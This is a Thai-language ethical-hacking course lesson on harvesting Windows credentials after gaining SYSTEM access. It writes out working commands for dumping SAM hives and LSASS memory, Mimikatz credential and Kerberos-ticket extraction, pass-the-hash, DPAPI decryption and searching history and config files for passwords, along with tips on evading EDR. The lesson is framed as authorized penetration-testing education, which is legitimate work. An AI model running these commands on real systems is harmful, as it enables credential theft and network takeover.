การเก็บเกี่ยวข้อมูลรับรอง
ดัมพ์ข้อมูลลับ
การเก็บเกี่ยวข้อมูลรับรอง เป็นบทเรียน Ethical Hacking Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 4 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Ethical Hacking Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน
เหตุใดจึงต้องเก็บเกี่ยวข้อมูลประจำตัว
แม้จะได้สิทธิ์ SYSTEM แล้ว รางวัลที่แท้จริงมักเป็น ข้อมูลประจำตัว เช่น แฮชรหัสผ่าน รหัสผ่านแบบข้อความธรรมดา และตั๋วที่ช่วยให้เคลื่อนที่ไปยังเครื่องอื่นและเข้าถึงโดเมนได้ การเก็บเกี่ยวข้อมูลประจำตัว เปลี่ยนการยึดครองเครื่องหนึ่งเครื่องให้กลายเป็นการยึดครองทั้งเครือข่าย
ฐานข้อมูล SAM
แฮชของบัญชีภายในเครื่องอยู่ในกลุ่มรีจิสทรี SAM และเข้ารหัสด้วยคีย์ในกลุ่ม SYSTEM เมื่อมีสิทธิ์ SYSTEM คุณสามารถดัมป์ทั้งสองส่วนแล้วสกัดแฮช NTLM แบบออฟไลน์ได้
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# then: secretsdump.py -sam sam.save -system system.save LOCALหน่วยความจำของ LSASS
กระบวนการ LSASS เก็บข้อมูลประจำตัวของผู้ใช้ที่เข้าสู่ระบบไว้ในหน่วยความจำ ซึ่งมักรวมถึงรหัสผ่านแบบข้อความธรรมดา แฮช NTLM ที่นำกลับมาใช้ได้ และตั๋ว Kerberos การดัมป์ LSASS จึงเป็นการเก็บเกี่ยวข้อมูลที่มีมูลค่าสูงสุด
rundll32 comsvcs.dll, MiniDump <lsass_pid> C:\Temp\lsass.dmp fullMimikatz
Mimikatz เป็นเครื่องมือสกัดข้อมูลประจำตัวที่มีชื่อเสียง คำสั่ง sekurlsa::logonpasswords ดึงข้อมูลประจำตัวจาก LSASS นอกจากนี้ยังสามารถสกัดตั๋ว ทำการส่งต่อแฮช และดัมป์ SAM ได้ด้วย
privilege::debug
sekurlsa::logonpasswords
lsadump::samการส่งต่อแฮช
โดยมากคุณไม่จำเป็นต้องถอดรหัสแฮช เพราะ การส่งต่อแฮช สามารถยืนยันตัวตนโดยใช้แฮช NTLM โดยตรง นี่คือเหตุผลที่การดัมป์แฮชก็เพียงพอสำหรับการเคลื่อนที่ไปยังเครื่องอื่นที่ใช้ข้อมูลประจำตัวผู้ดูแลระบบภายในเครื่องร่วมกัน
pth-winexe -U "admin%aad3b...:31d6c..." //10.0.0.6 cmd
# or evil-winrm -i host -u admin -H <NThash>ข้อมูลประจำตัวโดเมนที่แคชไว้
เครื่องที่เข้าร่วมโดเมนจะแคชการเข้าสู่ระบบครั้งล่าสุด (MSCache/DCC2) เพื่อให้ผู้ใช้เข้าสู่ระบบแบบออฟไลน์ได้ แฮชที่แคชไว้นี้สามารถดัมป์และถอดรหัสแบบออฟไลน์ได้ แม้จะใช้เวลานาน และอาจทำให้ได้รหัสผ่านโดเมน
secretsdump.py -system system.save -security security.save LOCALข้อมูลประจำตัวที่บันทึกและจัดเก็บไว้
Windows จัดเก็บข้อมูลประจำตัวไว้ใน Credential Manager / Vault และในข้อมูลที่ได้รับการป้องกันด้วย DPAPI (เช่น RDP ที่บันทึกไว้ รหัสผ่านเบราว์เซอร์ และ Wi-Fi) เมื่อมี SYSTEM และคีย์หลัก คุณสามารถถอดรหัสข้อมูลเหล่านี้ได้
cmdkey /list
vaultcmd /listcreds
mimikatz: dpapi::cred /in:<blob>การขโมยตั๋ว Kerberos
ใน Active Directory คำสั่ง sekurlsa::tickets ของ Mimikatz จะส่งออก TGT/TGS ของ Kerberos ตั๋วที่ขโมยมาช่วยให้ทำ การส่งต่อตั๋ว ได้ และ TGT ของผู้ดูแลโดเมนอาจนำไปสู่การคงอยู่ด้วย Golden/Silver Ticket
sekurlsa::tickets /exportไฟล์และสคริปต์ที่มีข้อมูลลับ
อย่ามองข้ามสิ่งที่หาได้ง่าย เช่น สคริปต์ ไฟล์การกำหนดค่า และประวัติที่เต็มไปด้วยข้อมูลประจำตัวแบบข้อความธรรมดา ประวัติ PowerShell ไฟล์การติดตั้งแบบไม่ต้องดูแล และสตริงการเชื่อมต่อใน IIS web.config มักมีรหัสผ่านอยู่
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
findstr /si "password connectionString" *.configการล้างร่องรอยและ OPSEC
การดัมป์ LSASS ถูกเฝ้าระวังอย่างเข้มงวดโดย EDR และ Defender Credential Guard อาจบล็อกการดำเนินการนี้ ในการปฏิบัติงานควรเลือกวิธีที่แฝงตัวได้ดี ล้างไฟล์ดัมป์ และบันทึกสิ่งที่เข้าถึงไว้ในรายงาน
จริยธรรมและการได้รับอนุญาต
การเก็บเกี่ยวข้อมูลประจำตัวเปิดเผยข้อมูลลับที่ละเอียดอ่อนที่สุดขององค์กร ควรจัดการข้อมูลประจำตัวที่ดัมป์มาอย่างปลอดภัย ห้ามนำข้อมูลออกนอกขอบเขตงาน และปฏิบัติงานภายใต้การอนุญาตเป็นลายลักษณ์อักษรอย่างชัดเจนเท่านั้น
ตรวจสอบความเข้าใจอย่างรวดเร็ว
ทดสอบความรู้เกี่ยวกับการเก็บเกี่ยวข้อมูลประจำตัว
สรุปทบทวน
คุณได้เรียนรู้เรื่องการเก็บเกี่ยวข้อมูลประจำตัว:
- ดัมป์ SAM เพื่อรับแฮชภายในเครื่อง และดัมป์ LSASS เพื่อรับข้อมูลของผู้ใช้ที่เข้าสู่ระบบและตั๋วต่าง ๆ
- Mimikatz สกัดรหัสผ่าน แฮช และตั๋ว Kerberos ได้
- การส่งต่อแฮช / การส่งต่อตั๋ว ช่วยให้เคลื่อนที่ไปยังเครื่องอื่นได้โดยไม่ต้องถอดรหัส
- ตรวจสอบ Credential Manager, DPAPI และไฟล์การกำหนดค่า/ประวัติเพื่อค้นหาข้อมูลลับ
หลักสูตรการเพิ่มสิทธิ์บน Windows จบลงเพียงเท่านี้
เรียนรู้ Ethical Hacking Academy ด้วย AI tutor — ฟรี
เขียนและเรียกใช้โค้ดจริงในเบราว์เซอร์ของคุณ รับความช่วยเหลือทันทีจาก AI tutor 24/7 และเรียนรู้ต่อจากที่คุณหยุดบนเว็บหรือในแอป
- คอร์ส
- 31
- บทเรียน
- 111
คำถามที่พบบ่อย
บทเรียน “การเก็บเกี่ยวข้อมูลรับรอง” ฟรีหรือไม่
ใช่ — ข้อความเต็มของ “การเก็บเกี่ยวข้อมูลรับรอง” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Ethical Hacking Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน
คุณจะเรียนรู้อะไรในบทเรียน “การเก็บเกี่ยวข้อมูลรับรอง”
ดัมพ์ข้อมูลลับ คุณปฏิบัติ Ethical Hacking Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน
คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Ethical Hacking Academy หรือไม่
ไม่จำเป็นต้องมีประสบการณ์มาก่อน Ethical Hacking Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 4 จากทั้งหมด 4 บทเรียน
บทเรียน “การเก็บเกี่ยวข้อมูลรับรอง” ใช้เวลานานแค่ไหน
บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย
ฉันเขียนและรันโค้ดในบทเรียน Ethical Hacking Academy นี้ได้ไหม
ได้ บทเรียน Ethical Hacking Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ
บทเรียนทั้งหมดในหลักสูตรนี้
- การแจกแจงข้อมูลของ Windows
- การกำหนดค่าบริการผิดพลาด
- การปลอมตัวเป็นโทเค็น
- การเก็บเกี่ยวข้อมูลรับรอง